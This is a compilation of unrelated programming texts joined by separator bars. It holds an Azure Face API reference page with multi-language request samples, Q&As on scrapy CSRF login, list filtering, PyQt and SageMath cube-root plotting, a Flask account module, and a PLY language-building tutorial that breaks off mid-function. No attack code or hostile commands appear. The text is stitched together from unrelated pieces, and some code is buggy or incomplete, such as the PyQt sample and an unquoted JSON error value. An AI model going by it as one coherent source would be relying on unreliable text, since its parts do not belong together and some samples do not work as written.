targetFace: A face rectangle specifying the target face to be added into the face list, in the format "targetFace=left,top,width,height", e.g. "targetFace=10,10,100,100". If there is more than one face in the image, targetFace is required to specify which face to add. No targetFace means there is only one face detected in the entire image.
detectionModel: The 'detectionModel' associated with the detected faceIds. Supported 'detectionModel' values include "detection_01" and "detection_02". The default value is "detection_01".
Request headers
Request body
JSON fields in request body:
Fields Type Description
url String Image url. Image file size should be between 1KB and 6MB. Only one face is allowed per image.
{
"url": "http://example.com/1.jpg"
}
[binary data]
Response 200
A successful call returns a new persistedFaceId.
JSON fields in response body:
Fields Type Description
persistedFaceId String persistedFaceId of the added face, which is persisted and will not expire. Different from faceId which is created in Face - Detect and will expire in 24 hours after the detection call.
{
"persistedFaceId": "B8D802CF-DD8F-4E61-B15C-9E6C5844CCBA"
}
Response 400
Error code and message returned in JSON:
Error Code Error Message Description
BadArgument Bad and unrecognizable JSON body.
BadArgument 'userData' is too long.
BadArgument Argument targetFace out of range, targetFace is valid but it's intersection with the entire image is empty.
BadArgument Invalid argument targetFace. Caused by invalid string format or invalid left/top/height/width value.
BadArgument 'detectionModel' is invalid.
InvalidURL Invalid image URL.
InvalidURL Failed to download from target server. Remote server error returned.
InvalidImage There is more than 1 face in the image or in the specified targetFace area.
InvalidImage No face detected in the image or in the specified targetFace area.
InvalidImage Decoding error, image format unsupported.
InvalidImageSize Image size is too small.
InvalidImageSize Image size is too big.
{
"error": {
"code": "BadArgument",
"message": "JSON parsing error."
}
}
Response 401
Error code and message returned in JSON:
Error Code Error Message Description
Unspecified Invalid subscription Key or user/plan is blocked.
{
"error": {
"code": "Unspecified",
"message": "Access denied due to invalid subscription key. Make sure you are subscribed to an API you are trying to call and provide the right key."
}
}
Response 403
Persisted face number reached limit, maximum is 1000 per face list.
{
"error": {
"code": "QuotaExceeded",
"message": "Face number reached limit."
}
}
Response 404
Error code and message returned in JSON:
Error Code Error Message Description
FaceListNotFound Face list is not found.
FaceListNotFound Face list ID is invalid. Valid format should be a string composed by numbers, English letters in lower case, '-', '_', and no longer than 64 characters.
{
"error": {
"code": "FaceListNotFound",
"message": "Face list is not found."
}
}
Response 408
Operation exceeds maximum execution time.
{
"error": {
"code": "OperationTimeOut",
"message": "Request Timeout."
}
}
Response 409
{
"error": {
"code": ConcurrentOperationConflict,
"message": "There is a conflict operation on requested resource, please try later."
}
}
Response 415
Unsupported media type error. Content-Type is not in the allowed types:
For an image URL, Content-Type should be application/json.
For a local image, Content-Type should be application/octet-stream.
{
"error": {
"code": "BadArgument",
"message": "Invalid Media Type."
}
}
Response 429
{
"error": {
"statusCode": 429,
"message": "Rate limit is exceeded. Try again in 26 seconds."
}
}
Code samples
@ECHO OFF
curl -v -X POST "https://northeurope.api.cognitive.microsoft.com/face/v1.0/facelists/{faceListId}/persistedFaces?userData={string}&targetFace={string}&detectionModel=detection_01"
-H "Content-Type: application/json"
-H "Ocp-Apim-Subscription-Key: {subscription key}"
--data-ascii "{body}"
using System;
using System.Net.Http.Headers;
using System.Text;
using System.Net.Http;
using System.Web;
namespace CSHttpClientSample
{
static class Program
{
static void Main()
{
MakeRequest();
Console.WriteLine("Hit ENTER to exit...");
Console.ReadLine();
}
static async void MakeRequest()
{
var client = new HttpClient();
var queryString = HttpUtility.ParseQueryString(string.Empty);
// Request headers
client.DefaultRequestHeaders.Add("Ocp-Apim-Subscription-Key", "{subscription key}");
// Request parameters
queryString["userData"] = "{string}";
queryString["targetFace"] = "{string}";
queryString["detectionModel"] = "detection_01";
var uri = "https://northeurope.api.cognitive.microsoft.com/face/v1.0/facelists/{faceListId}/persistedFaces?" + queryString;
HttpResponseMessage response;
// Request body
byte[] byteData = Encoding.UTF8.GetBytes("{body}");
using (var content = new ByteArrayContent(byteData))
{
content.Headers.ContentType = new MediaTypeHeaderValue("< your content type, i.e. application/json >");
response = await client.PostAsync(uri, content);
}
}
}
}
// This sample uses the Apache HTTP client from HTTP Components (http://hc.apache.org/httpcomponents-client-ga/)
import java.net.URI;
import org.apache.http.HttpEntity;
import org.apache.http.HttpResponse;
import org.apache.http.client.HttpClient;
import org.apache.http.client.methods.HttpPost;
import org.apache.http.client.utils.URIBuilder;
import org.apache.http.impl.client.HttpClients;
import org.apache.http.util.EntityUtils;
public class JavaSample
{
public static void main(String[] args)
{
HttpClient httpclient = HttpClients.createDefault();
try
{
URIBuilder builder = new URIBuilder("https://northeurope.api.cognitive.microsoft.com/face/v1.0/facelists/{faceListId}/persistedFaces");
builder.setParameter("userData", "{string}");
builder.setParameter("targetFace", "{string}");
builder.setParameter("detectionModel", "detection_01");
URI uri = builder.build();
HttpPost request = new HttpPost(uri);
request.setHeader("Content-Type", "application/json");
request.setHeader("Ocp-Apim-Subscription-Key", "{subscription key}");
// Request body
StringEntity reqEntity = new StringEntity("{body}");
request.setEntity(reqEntity);
HttpResponse response = httpclient.execute(request);
HttpEntity entity = response.getEntity();
if (entity != null)
{
System.out.println(EntityUtils.toString(entity));
}
}
catch (Exception e)
{
System.out.println(e.getMessage());
}
}
}
<!DOCTYPE html>
<html>
<head>
<title>JSSample</title>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.9.0/jquery.min.js"></script>
</head>
<body>
<script type="text/javascript">
$(function() {
var params = {
// Request parameters
"userData": "{string}",
"targetFace": "{string}",
"detectionModel": "detection_01",
};
$.ajax({
url: "https://northeurope.api.cognitive.microsoft.com/face/v1.0/facelists/{faceListId}/persistedFaces?" + $.param(params),
beforeSend: function(xhrObj){
// Request headers
xhrObj.setRequestHeader("Content-Type","application/json");
xhrObj.setRequestHeader("Ocp-Apim-Subscription-Key","{subscription key}");
},
type: "POST",
// Request body
data: "{body}",
})
.done(function(data) {
alert("success");
})
.fail(function() {
alert("error");
});
});
</script>
</body>
</html>
#import <Foundation/Foundation.h>
int main(int argc, const char * argv[])
{
NSAutoreleasePool * pool = [[NSAutoreleasePool alloc] init];
NSString* path = @"https://northeurope.api.cognitive.microsoft.com/face/v1.0/facelists/{faceListId}/persistedFaces";
NSArray* array = @[
// Request parameters
@"entities=true",
@"userData={string}",
@"targetFace={string}",
@"detectionModel=detection_01",
];
NSString* string = [array componentsJoinedByString:@"&"];
path = [path stringByAppendingFormat:@"?%@", string];
NSLog(@"%@", path);
NSMutableURLRequest* _request = [NSMutableURLRequest requestWithURL:[NSURL URLWithString:path]];
[_request setHTTPMethod:@"POST"];
// Request headers
[_request setValue:@"application/json" forHTTPHeaderField:@"Content-Type"];
[_request setValue:@"{subscription key}" forHTTPHeaderField:@"Ocp-Apim-Subscription-Key"];
// Request body
[_request setHTTPBody:[@"{body}" dataUsingEncoding:NSUTF8StringEncoding]];
NSURLResponse *response = nil;
NSError *error = nil;
NSData* _connectionData = [NSURLConnection sendSynchronousRequest:_request returningResponse:&response error:&error];
if (nil != error)
{
NSLog(@"Error: %@", error);
}
else
{
NSError* error = nil;
NSMutableDictionary* json = nil;
NSString* dataString = [[NSString alloc] initWithData:_connectionData encoding:NSUTF8StringEncoding];
NSLog(@"%@", dataString);
if (nil != _connectionData)
{
json = [NSJSONSerialization JSONObjectWithData:_connectionData options:NSJSONReadingMutableContainers error:&error];
}
if (error || !json)
{
NSLog(@"Could not parse loaded json with error:%@", error);
}
NSLog(@"%@", json);
_connectionData = nil;
}
[pool drain];
return 0;
}
<?php
// This sample uses the PEAR HTTP_Request2 package (http://pear.php.net/package/HTTP_Request2)
require_once 'HTTP/Request2.php';
$request = new Http_Request2('https://northeurope.api.cognitive.microsoft.com/face/v1.0/facelists/{faceListId}/persistedFaces');
$url = $request->getUrl();
$headers = array(
// Request headers
'Content-Type' => 'application/json',
'Ocp-Apim-Subscription-Key' => '{subscription key}',
);
$request->setHeader($headers);
$parameters = array(
// Request parameters
'userData' => '{string}',
'targetFace' => '{string}',
'detectionModel' => 'detection_01',
);
$url->setQueryVariables($parameters);
$request->setMethod(HTTP_Request2::METHOD_POST);
// Request body
$request->setBody("{body}");
try
{
$response = $request->send();
echo $response->getBody();
}
catch (HttpException $ex)
{
echo $ex;
}
?>
########### Python 2.7 #############
import httplib, urllib, base64
headers = {
# Request headers
'Content-Type': 'application/json',
'Ocp-Apim-Subscription-Key': '{subscription key}',
}
params = urllib.urlencode({
# Request parameters
'userData': '{string}',
'targetFace': '{string}',
'detectionModel': 'detection_01',
})
try:
    conn = httplib.HTTPSConnection('northeurope.api.cognitive.microsoft.com')
    conn.request("POST", "/face/v1.0/facelists/{faceListId}/persistedFaces?%s" % params, "{body}", headers)
    response = conn.getresponse()
    data = response.read()
    print(data)
    conn.close()
except Exception as e:
    print("[Errno {0}] {1}".format(e.errno, e.strerror))
####################################
########### Python 3.2 #############
import http.client, urllib.request, urllib.parse, urllib.error, base64
headers = {
# Request headers
'Content-Type': 'application/json',
'Ocp-Apim-Subscription-Key': '{subscription key}',
}
params = urllib.parse.urlencode({
# Request parameters
'userData': '{string}',
'targetFace': '{string}',
'detectionModel': 'detection_01',
})
try:
    conn = http.client.HTTPSConnection('northeurope.api.cognitive.microsoft.com')
    conn.request("POST", "/face/v1.0/facelists/{faceListId}/persistedFaces?%s" % params, "{body}", headers)
    response = conn.getresponse()
    data = response.read()
    print(data)
    conn.close()
except Exception as e:
    print("[Errno {0}] {1}".format(e.errno, e.strerror))
####################################
require 'net/http'
uri = URI('https://northeurope.api.cognitive.microsoft.com/face/v1.0/facelists/{faceListId}/persistedFaces')
uri.query = URI.encode_www_form({
# Request parameters
'userData' => '{string}',
'targetFace' => '{string}',
'detectionModel' => 'detection_01'
})
request = Net::HTTP::Post.new(uri.request_uri)
# Request headers
request['Content-Type'] = 'application/json'
request['Ocp-Apim-Subscription-Key'] = '{subscription key}'
# Request body
request.body = "{body}"
response = Net::HTTP.start(uri.host, uri.port, :use_ssl => uri.scheme == 'https') do |http|
http.request(request)
end
puts response.body
|
I'm having some trouble getting scrapy to authenticate against my application. I'm using requests to fetch the csrftoken, and right afterwards I make a request to the login route passing the credentials. For some reason it returns this message:
Forbidden (CSRF cookie not set.): /login/
HTTP POST /login/ 403 [0.01, 127.0.0.1:58148]
My code:
class TestSpider(InitSpider):
    name = 'spider'
    allowed_domains = ['localhost:8000']
    login_page = 'http://localhost:8000/login/'
    start_urls = ['http://localhost:8000/']
    user_agent = 'Spider 2.0'
    rules = (
        Rule(LinkExtractor(), callback='parse_item', follow=True),
    )

    def init_request(self):
        rsp = requests.get(self.start_urls[0], headers={'User-Agent': USER_AGENT})
        csrftoken = None
        if 'csrftoken' in rsp.cookies:
            csrftoken = rsp.cookies['csrftoken']
        else:
            csrftoken = rsp.cookies['csrf']
        print(csrftoken)  # The csrftoken is printed, ok.
        my_data = {'username': 'xxxx', 'password': 'xxxxx', 'csrfmiddlewaretoken': csrftoken}
        return Request(url=self.login_page, method='POST',
                       cookies={'sessionid': rsp.cookies.get('sessionid')},
                       body=json.dumps(my_data),
                       headers={'Content-Type': 'application/json', 'User-Agent': USER_AGENT},
                       callback=self.login)

    def login(self, response):
        if "OLÁ" in response.text:
            print("LOGGED IN!")
            return self.initialized()
        else:
            print("Problem with login")
|
I have list1 and list2. list2 is a group of words that have to be removed from list1, for example:
list1 = ['paste', 'text', 'text', 'here', 'here', 'here', 'my', 'i', 'i', 'me', 'me']
list2 = ["i", "me"]
Desired output:
list3=['paste', 'text', 'text', 'here', 'here', 'here', 'my']
I have tried different versions using 'for' but no results so far.
Any ideas would be appreciated!
Use list comprehension:
>>> list1 = ['paste', 'text', 'text', 'here', 'here', 'here', 'my', 'i', 'i', 'me', 'me']
>>> list2 = ["i","me"]
>>> list3 = [item for item in list1 if item not in list2]
>>> list3
['paste', 'text', 'text', 'here', 'here', 'here', 'my']
NOTE: Lookups in lists are O(n), consider making a set from list2 instead - lookups in sets are O(1).
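Following that note, the same filter with a set for O(1) lookups:
>>> blocked = set(list2)
>>> [item for item in list1 if item not in blocked]
['paste', 'text', 'text', 'here', 'here', 'here', 'my']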
|
# -*- coding: utf-8 -*-
"""Endpoints for user login and out."""

from __future__ import unicode_literals, absolute_import

from flask import Blueprint, request, redirect, url_for, session, flash
import re

import rophako.model.user as User
from rophako.utils import template

mod = Blueprint("account", __name__, url_prefix="/account")


@mod.route("/")
def index():
    return redirect(url_for(".login"))


@mod.route("/login", methods=["GET", "POST"])
def login():
    """Log into an account."""
    if request.method == "POST":
        username = request.form.get("username", "")
        password = request.form.get("password", "")

        # Lowercase the username.
        username = username.lower()

        if User.check_auth(username, password):
            # OK!
            db = User.get_user(username=username)
            session["login"] = True
            session["username"] = username
            session["uid"] = db["uid"]
            session["name"] = db["name"]
            session["role"] = db["role"]

            # Redirect them to a local page?
            url = request.form.get("url", "")
            if url.startswith("/"):
                return redirect(url)

            return redirect(url_for("index"))
        else:
            flash("Authentication failed.")
            return redirect(url_for(".login"))

    return template("account/login.html")


@mod.route("/logout")
def logout():
    """Log out the user."""
    session["login"] = False
    session["username"] = "guest"
    session["uid"] = 0
    session["name"] = "Guest"
    session["role"] = "user"

    flash("You have been signed out.")
    return redirect(url_for(".login"))


@mod.route("/setup", methods=["GET", "POST"])
def setup():
    """Initial setup to create the Admin user account."""

    # This can't be done if users already exist on the CMS!
    if User.exists(uid=1):
        flash("This website has already been configured (users already created).")
        return redirect(url_for("index"))

    if request.method == "POST":
        # Submitting the form.
        username = request.form.get("username", "")
        name = request.form.get("name", "")
        pw1 = request.form.get("password1", "")
        pw2 = request.form.get("password2", "")

        # Default name = username.
        if name == "":
            name = username

        # Lowercase the user.
        username = username.lower()
        if User.exists(username=username):
            flash("That username already exists.")
            return redirect(url_for(".setup"))

        # Validate the form.
        errors = validate_create_form(username, pw1, pw2)
        if errors:
            for error in errors:
                flash(error)
            return redirect(url_for(".setup"))

        # Create the account.
        uid = User.create(
            username=username,
            password=pw1,
            name=name,
            role="admin",
        )

        flash("Admin user created! Please log in now.")
        return redirect(url_for(".login"))

    return template("account/setup.html")


def validate_create_form(username, pw1=None, pw2=None, skip_passwd=False):
    """Validate the submission of a create-user form.

    Returns a list of error messages if there were errors, otherwise
    it returns None."""
    errors = list()

    if len(username) == 0:
        errors.append("You must provide a username.")
    if re.search(r'[^A-Za-z0-9-_]', username):
        errors.append("Usernames can only contain letters, numbers, dashes or underscores.")

    if not skip_passwd:
        if len(pw1) < 3:
            errors.append("You should use at least 3 characters in your password.")
        if pw1 != pw2:
            errors.append("Your passwords don't match.")

    if len(errors):
        return errors
    else:
        return None
|
I threw together a small program based on a textbook: an application that will manage a database.
Question 1: Why do we need to pass self into the functions (open or openZvuk)? Essentially I'm just creating an object of another class.
Question 2: After clicking the button that opens the third window (class WindowZvuk), the window just closes instantly, the console prints a restart, and nothing happens. I tried debugging this fragment on its own, without creating a class, and everything works fine. So I conclude that I messed something up when defining the class or something similar, but I can't figure it out myself.
I'd be grateful for criticism and hints; I've only just started learning.
from PyQt5 import QtWidgets, QtSql, QtCore
import sys

app = QtWidgets.QApplication(sys.argv)


class Windows(QtWidgets.QWidget):  # window class "Recording Studio"
    def __init__(self, parent=None):
        QtWidgets.QWidget.__init__(self, parent)
        btn1 = QtWidgets.QPushButton("View tables")
        self.resize(400, 300)
        self.setWindowTitle("Recording Studio")
        vbox = QtWidgets.QVBoxLayout()
        vbox.addWidget(btn1)
        self.setLayout(vbox)
        btn1.clicked.connect(self.open)

    def open(self):
        self.Twowin = Window2()
        self.Twowin.show()
        self.hide()


class Window2(QtWidgets.QWidget):  # window class "Table selection"
    def __init__(self, parent=None):
        QtWidgets.QWidget.__init__(self, parent)
        self.resize(400, 300)
        self.setWindowTitle("Table selection")
        btnTableZvuk = QtWidgets.QPushButton("Sound engineers table")
        vbox2 = QtWidgets.QVBoxLayout()
        vbox2.addWidget(btnTableZvuk)
        self.setLayout(vbox2)
        btnTableZvuk.clicked.connect(self.openZvuk)

    def openZvuk(self):
        self.WindowZv = WindowZvuk()  # check here how self works
        self.WindowZv.show()


class WindowZvuk(QtWidgets.QWidget):  # window class for the table view
    def __init__(self, parent=None):
        QtWidgets.QWidget.__init__(self, parent)
        self.resize(1000, 1000)
        con = QtSql.QSqlDatabase.addDatabase('QSQLITE')
        con.setDatabaseName('path')  # the path is deliberately omitted here; the original has it
        con.open()
        stm = QtSql.QSqlTableModel(parent=WindowZv)  # likely culprit: WindowZv is undefined here; probably meant parent=self
        stm.setTable('ZvukRez')
        stm.setSort(1, QtCore.Qt.AscendingOrder)
        stm.select()
        stm.setHeaderData(1, QtCore.Qt.Horizontal, 'Column 1')
        stm.setHeaderData(2, QtCore.Qt.Horizontal, 'Column 2')
        stm.setHeaderData(3, QtCore.Qt.Horizontal, 'Column 3')
        stm.setHeaderData(4, QtCore.Qt.Horizontal, 'Column 4')
        stm.setHeaderData(5, QtCore.Qt.Horizontal, 'Column 5')
        vbox3 = QtWidgets.QVBoxLayout()
        tv = QtWidgets.QTableView()
        tv.setmodel(stm)  # likely culprit: the method is setModel, not setmodel
        tv.hideColumn(0)
        tv.setColumnWidth(1, 150)
        tv.setColumnWidth(2, 150)
        tv.setColumnWidth(3, 150)
        tv.setColumnWidth(4, 150)
        tv.setColumnWidth(5, 150)
        vbox3.addWidget(tv)
        self.setLayout(self.vbox3)  # likely culprit: vbox3 is a local variable, not self.vbox3

    # def addRecord():
    #     stm.insertRow(stm.rowCount())
    # def delRecord():
    #     stm.removeRow(tv.currentIndex().row())
    #     stm.select()


MainWindow = Windows()
MainWindow.show()
# note: no app.exec_() call appears in the pasted code, so no event loop is started
|
How to correctly plot x^(1/3)
sage: plot(x**(1/3))
This command produces a graph that looks like this:
I was expecting a graph like this:
SageMath sometimes chooses complex cube roots, which explains this behavior.
There's not much you can do about this internal choice. But you can do this:
plot(sgn(x)*abs(x)^(1/3),(x,-13,13))
Another way is to use the method x.nth_root(3) for real numbers x.
Using this
sage: plot(lambda x: RR(x).nth_root(3), (-1, 1))
gives the desired plot.
[Edited after the question was updated, clarifying it is not "why does the graph not start at zero", but "why is the negative part missing".]
Together with the unsatisfactory plot, the command
sage: plot(x^(1/3))
gives some warnings:
verbose 0 (3797: plot.py, generate_plot_points)
WARNING: When plotting, failed to evaluate function at 100 points.
verbose 0 (3797: plot.py, generate_plot_points)
Last error message: 'can't convert complex to float'
They give a clue as to what goes wrong.
By default, plot plots on the interval $[-1, 1]$ using 200 points regularly spaced along that interval to evaluate the function being plotted.
The warning that it "failed to evaluate function at 100 points", and the plot it produces, reveal that it failed to get a point to plot for all the negative values.
Here is how Sage computes powers one-third of negative numbers, depending on whether they are rational or floating-point:
sage: a = (-1)^(1/3)
sage: a
(-1)^(1/3)
sage: b = (-1.)^(1/3)
sage: b
0.500000000000000 + 0.866025403784439*I
And here is what happens when trying to convert them to floats (plot does that):
sage: float(a)
---------------------------------------------------------------------------
Traceback (most recent call last)
...
TypeError: can't convert complex to float
During handling of the above exception, another exception occurred:
TypeError: unable to simplify to float approximation
sage: float(b)
Traceback (most recent call last)
...
TypeError: unable to convert 0.500000000000000 + 0.866025403784439*I
to float; use abs() or real_part() as desired
To plot the real-cube-root function, i.e. the composition inverse of the $(x \mapsto x^3)$ bijection, there are various options.
One is indicated in @rburing's answer, and uses the sign and the absolute value to work around this limitation in Sage. It is actually part of the SageMath FAQ, see:
One other option is to plot $x = y^3$ instead of $y = x^{1/3}$.
This can be done using a parametric plot:
sage: parametric_plot((lambda t: t^3, lambda t: t), (-1, 1))
This can also be done using an implicit plot since the desired graph is the locus where $x - y^3$ is zero:
sage: implicit_plot(lambda x, y: x - y^3, (-1, 1), (-1, 1))
By default implicit plot comes with a frame instead of axes.
One can add axes:
sage: implicit_plot(lambda x, y: x - y^3, (-1, 1), (-1, 1), axes=True)
One can additionally remove the frame:
sage: implicit_plot(lambda x, y: x - y^3, (-1, 1), (-1, 1), axes=True, frame=False)
|
Making your own programming language with Python
Why make your own language?
When you write your own programming language, you control the entire programmer experience.
This allows you to shape exactly how each aspect of your language works and how a developer interacts with it.
This allows you to make a language with things you like from other languages and none of the stuff you don't.
In addition, learning about programming language internals can help you better understand the internals of programming languages you use every day, which can make you a better programmer.
How programming languages work
Every programming language is different in the way it runs, but many consist of a couple fundamental steps: lexing and parsing.
Introduction to Lexing
Lexing is short for LEXical analysis.
The lex step is where the language takes the raw code you've written and converts it into an easily parsable structure.
This step interprets the syntax of your language and turns the text into special symbols called tokens.
For example, let's say you have some code you want to parse. To keep it simple I'll use python-like syntax, but it could be anything. It doesn't even have to be text.
# this is a comment
a = (1 + 1)
A lexer to parse this code might do the following:
Discard all comments
Produce a token that represents a variable name
Produce left and right parenthesis tokens
Convert literals like numbers or strings to tokens
Produce tokens for math operations like + - * / (and maybe bitwise/logical operators as well)
The lexer will take the raw code and interpret it into a list of tokens.
The lexer can also be used to ensure that two pieces of code that look different, like 1 + 1 and 1+1, are still parsed the same way.
For the code above, it might generate tokens like this:
NAME(a) EQUALS LPAREN NUMBER(1) PLUS NUMBER(1) RPAREN
Tokens can be in many forms, but the main idea here is that they are a standard and easy to parse way of representing the code.
Introduction to Parsing
The parser is the next step in the running of your language.
Now that the lexer has turned the text into consistent tokens, the parser simplifies and executes them.
Parser rules recognize a sequence of tokens and do something about them.
Let's look at a simple example for a parser with the same tokens as above.
A simple parser could just say:
If I see the GREET token and then a NAME token, print "Hello," and then the name.
A more complicated parser aiming to parse the code above might have these rules, which we will explore later:
Try to classify as much code as possible as an expression. By "as much code as possible" I mean the parser will first try to treat a full mathematical operation as an expression, and only if that fails convert a single variable or number to an expression. This ensures that as much code as possible is matched as an expression. The "expression" concept lets us catch many patterns of tokens with one piece of code. We will use the expression in the next step.
Now that we have a concept of an expression, we can tell the parser that if it sees the tokens NAME EQUALS and then an expression, a variable is being assigned. (A sketch of such rules appears below.)
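As a hedged preview of what those rules can look like in PLY (token names like NUMBER and EQUALS are assumed here; they would be defined the same way as the tokens later in this tutorial, and variables is a plain dict acting as the environment):
def p_expression_binop(t):
    'expression : expression PLUS expression'
    t[0] = t[1] + t[3]

def p_expression_number(t):
    'expression : NUMBER'
    t[0] = t[1]

def p_statement_assign(t):
    'statement : NAME EQUALS expression'
    variables[t[1]] = t[3]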
Using PLY to write your language
What is PLY?
Now that we know the basics of lexing and parsing, lets start writing some python code to do it.
PLY stands for Python Lex Yacc.
It is a library you can use to make your own programming language with python.
Lex is a well known library for writing lexers.
Yacc stands for "Yet Another Compiler Compiler", meaning it is a compiler that produces compilers: in our case, the parser for a new language.
This tutorial is a short example, but the PLY documentation is an amazing resource with tons of examples. I would highly recommend that you check it out if you are using PLY.
For this example, we are going to be building a simple calculator with variables. If you want to see the fully completed example, you can fork this repl: [TODO!!]
Lexing with PLY lex
Lexer tokens
Lets start our example! Fire up a new python repl and follow along with the code samples.
To start off, we need to import PLY:
from ply import lex, yacc
Now let's define our first token. PLY requires you to have a tokens list which contains every token the lexer can produce. Let's define our first token, PLUS for the plus sign:
tokens = [
    'PLUS',
]

t_PLUS = r'\+'
A string that looks like r'' is special in python. The r prefix means "raw", which keeps backslashes in the string. For example, to define the string \+ in python, you could either do '\\+' or r'\+'. We are going to be using a lot of backslashes, so raw strings make things a lot easier.
But what does \+ mean?
Well in the lexer, tokens are mainly parsed using regexes.
A regex is like a special programming language specifically for matching patterns in text.
A great resource for regexes is regex101.com where you can test your regexes with syntax highlighting and see explanations of each part.
I'm going to explain the regexes included in this tutorial, but if you want to learn more you can play around with regex101 or read one of the many good regex tutorials on the internet.
The regex \+ means "match a single character +".
We have to put a backslash before it because + normally has a special meaning in regex, so we have to "escape" it to show we want to match a + literally.
We are also required to define a function that runs when the lexer encounters an error:
def t_error(t):
    print(f"Illegal character {t.value[0]!r}")
    t.lexer.skip(1)
This function just prints out a warning when it hits a character it doesn't recognize and then skips it (the !r means repr so it will print out quotes around the character).
You can change this to be whatever you want in your language though.
Optionally, you can define a newline token which isn't produced in the output of the lexer, but keeps track of each line.
def t_newline(t):
    r'\n+'
    t.lexer.lineno += len(t.value)
Since this token is a function, we can define the regex in the docstring of the function instead.
The function takes a parameter t, which is a special object representing the match that the lexer found. We can access the lexer through the t.lexer attribute.
This function matches at least one newline character and then increases the line number by the number of newlines it sees. This allows the lexer to know what line number it's on at all times, via the lexer.lineno variable.
Now we can use the line number in our error function:
def t_error(t):
    print(f"Illegal character {t.value[0]!r} on line {t.lexer.lineno}")
    t.lexer.skip(1)
Let's test out the lexer!
This is just some temporary code, you don't have to know what this code does, because once we implement a parser, the parser will run the lexer for you.
lexer = lex.lex()
lexer.input('+')

for token in lexer:
    print(token)
Play around with the value passed to lexer.input.
You should notice that any character other than a plus sign makes the error message print out, but doesn't crash the program.
In your language, you can make it gracefully ignore lex errors like this or make it stop running by editing the t_error function.
If you add more lines to the input string, the line number in the error message should change.
More complicated tokens
Let's delete the test token and add some more complicated tokens.
Replace your tokens list and the t_PLUS line with the following code:
reserved_tokens = {
    'greet': 'GREET'
}

tokens = list(reserved_tokens.values()) + [
    'SPACE',
    'NAME',
]

t_SPACE = r'[ ]'

def t_ID(t):
    r'[a-zA-Z_][a-zA-Z0-9_]*'
    if t.value in reserved_tokens:
        t.type = reserved_tokens[t.value]
    else:
        t.type = 'NAME'
    return t
Let's explore the regex we have in the t_ID function.
This regex is more complicated than the simple ones we've used before.
First, we have [a-zA-Z_]. This is a character class in regex. It means, match any lowercase letter, uppercase letter, or underscore.
Next we have [a-zA-Z0-9_]. This is the same as above, except digits are also included.
Finally, we have *. This means "repeat the previous group or class zero or more times".
Why do we structure the regex like this?
Having two separate classes ensures that the first character must match the first class for the whole thing to be a valid variable name.
Excluding digits from the first class not only prevents matching plain numbers, it also makes sure a variable name can't start with a digit.
You can still have digits in the variable name, because they are matched by the second class of the regex.
In the code, we first have a dictionary of reserved names.
This is a mapping of patterns to the token type that they should be.
The only one we have says that greet should be mapped to the GREET token.
The code that sets up the tokens list takes all of the possible reserved token values (in this example that's just ['GREET']) and adds on ['SPACE', 'NAME'], giving us ['GREET', 'SPACE', 'NAME'] automatically!
But why do we have to do this? Couldn't we just use something like the following code?
# Don't use this code! It doesn't work!
t_GREET = r'greet'
t_SPACE = r'[ ]'
t_NAME = r'[a-zA-Z_][a-zA-Z0-9_]*'
Actually, if we used that code, greet would never be matched! The lexer would match it with the NAME token. To avoid this, we define a new type of token which is a function. This function has the regex as its docstring and is passed a t parameter. This parameter has a value attribute, which is the text that was matched.
The code inside this function simply checks whether this value is one of the special reserved names we defined before. If it is, we set the special type attribute of the t parameter. This type controls the type of token produced from the match. When the lexer sees the name greet, the function finds greet in the reserved names dictionary and produces a token of type GREET, because that is the corresponding value in the dictionary. Otherwise, it produces a NAME token, because this is a regular variable.
This allows you to add more reserved terms easily later; it's as simple as adding a value to the dictionary.
If needed, you could also make the keys of the reserved names dictionary regexes and then match each regex against t.value in the function, as sketched below.
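A rough sketch of that regex-keyed variant (the pattern and token name here are invented for illustration):
import re

# Hypothetical: reserved patterns are regexes instead of plain strings
reserved_patterns = {
    r'greet(ing)?': 'GREET',  # matches "greet" or "greeting"
}

def t_NAME(t):
    r'[a-zA-Z_][a-zA-Z0-9_]*'
    t.type = 'NAME'
    for pattern, token_type in reserved_patterns.items():
        if re.fullmatch(pattern, t.value):  # match each regex against t.value
            t.type = token_type
            break
    return t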
If you want to change these rules for your language, feel free!
Parsing with PLY yacc
Fair warning: yacc can sometimes be hard to use and debug, even if you know Python well.
Keep in mind, you don't have to use both lex and yacc, if you want you can just use lex and then write your own code to parse the tokens.
With that said, let's get started.
Yacc basics
Before we get started, delete the lexer testing code (everything from lexer.input onward).
When we run the parser, the lexer is automatically run.
Let's add our first parser rule!
def p_hello(t):
'statement : GREET SPACE NAME'
print(list(t))
print(f"Hello, {t[3]}")
Let's break this down.
Again, we have information on the rule in the docstring.
This information is called a BNF grammar. A rule in a BNF grammar consists of a non-terminal (the thing being defined) and terminals.
In the example above, statement is the non-terminal and GREET, SPACE, and NAME are terminals.
The left-hand side describes what is produced by the rule, and the right-hand side describes what matches the rule.
The right hand side can also have non-terminals in it, just be careful to avoid infinite loops.
Basically, the yacc parser works by pushing tokens onto a stack, and looking at the current stack and the next token and seeing if they match any rules that it can use to simplify them. Here is a more in-depth explanation and example.
Before the above example can run, we still have to add some more code.
Just like for the lexer, the error handler is required:
def p_error(t):
if t is None: # lexer error, already handled
return
print(f"Syntax Error: {t.value!r}")
Now let's create and run the parser:
parser = yacc.yacc()
parser.parse('greet replit')
If you run this code you should see:
[None, 'greet', ' ', 'replit']
Hello, replit
The first line is the list version of the object passed to the parser function.
The first value is the statement that will be produced from the function, so it is None.
Next, we have the values of the tokens we specified in the rule.
This is where the t[3] part comes from: it is the item at index 3, which is the NAME token, so our parser prints out Hello, replit!
Note: Creating the parser tables is a relatively expensive operation, so the parser creates a file called parsetab.py which it can load the parse tables from if they haven't changed.
You can change this filename by passing a kwarg into the yacc initialization, like parser = yacc.yacc(tabmodule='fooparsetab').
More complicated parsing: Calculator
This example is different from our running example, so I will just show a full code example and explain it.
from ply import lex, yacc
tokens = (
'NUMBER',
'PLUS', 'MINUS', 'TIMES', 'DIVIDE',
'LPAREN', 'RPAREN',
)
t_PLUS = r'\+'
t_MINUS = r'-'
t_TIMES = r'\*'
t_DIVIDE = r'/'
t_LPAREN = r'\('
t_RPAREN = r'\)'
def t_NUMBER(t):
r'\d+'
try:
t.value = int(t.value)
except ValueError:
print(f"Integer value too large: {t.value}")
t.value = 0
return t
def t_newline(t):
r'\n+'
t.lexer.lineno += len(t.value)
def t_error(t):
print(f"Illegal character {t.value[0]!r} on line {t.lexer.lineno}")
t.lexer.skip(1)
t_ignore = ' \t'
lexer = lex.lex()
# Parsing
def p_expression_binop(t):
'''expression : expression PLUS expression
| expression MINUS expression
| expression TIMES expression
| expression DIVIDE expression'''
if t[2] == '+' : t[0] = t[1] + t[3]
